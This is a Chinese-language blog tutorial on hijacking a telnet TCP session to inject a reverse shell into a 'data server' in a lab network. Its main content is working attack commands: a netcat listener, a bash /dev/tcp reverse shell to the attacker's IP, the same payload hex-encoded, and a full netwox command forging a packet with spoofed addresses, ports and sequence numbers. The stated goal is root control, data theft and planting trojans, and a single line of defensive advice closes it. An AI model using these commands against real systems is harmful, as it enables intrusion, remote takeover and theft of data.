TCP劫持下的反彈Shell注入攻擊

反彈Shell的注入

 

思路:

通過劫持Server與數據Server的TCP報文,並僞造成Server,向其注入反彈Shell,使攻擊者獲得對數據Server的完全控制,竊取數據

 

全局模式下測試:

攻擊者Kali監聽這個10000端口

$ nc -lp 10000 -vvv

 

數據Server跟Kali進行TCP會話的建立

# bash -i>&/dev/tcp/192.168.211.130/10000 0>&1

 

此時攻擊者就連接上了數據Server,而且是root權限,接下來就可以注入木馬,竊取數據

劫持下的反彈Shell注入

 

步驟:

1.首先獲取Server與數據Server的TCP會話

Server telnet 數據Server

 

2.將注入的代碼段轉換成16進制格式

攻擊代碼

bash -i>&/dev/tcp/192.168.211.130/10000 0>&1

16進制 並在其後加入0d00

62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00
sudo netwox 40 --ip4-ttl  64 --ip4-protocol  6 --ip4-src 192.168.211.134 --ip4-dst 192.168.211.133   --tcp-src  48271 --tcp-dst 23  --tcp-seqnum 1853475182 --tcp-acknum 1216288044  --tcp-ack  --tcp-psh --tcp-window 227 --tcp-data  62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00

實施攻擊:

 

終端欄的第四個窗口是Kali正在進行監聽的TCP端口號爲10000的會話

查看:可見Kali已經攻擊成功,並且進入到了數據Server,這裏之所以是redhat用戶,是因爲Server telnet的是數據Server上的redhat用戶

詳細分析:

觀察打擊後的兩個telnet包,可見是Server發送給數據Server一個數據爲 攻擊者Kali注入的代碼,但是此時,其實是攻擊者冒充了Server,對於數據Server來說,他並不知道,因爲攻擊者Kali將源目IP、源目端口、ACK、SEQ都僞造了,數據Server是無法判斷的,數據Server還會給他一個迴應,這一旦迴應,攻擊者Kali直接登錄到數據Server上

 

這時,Server就斷開了與數據Server的telnet連接,一直等不到迴應是因爲此時的telnet來連接時攻擊者Kali與數據Server建立的,這樣一直虛假重傳,過會就會斷開連接

而此時,Kali可以隨意的竊取並留下一些木馬病毒

防禦:

       使用SSL加密tcp ,ipsec加密IP,二層加密

 


 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章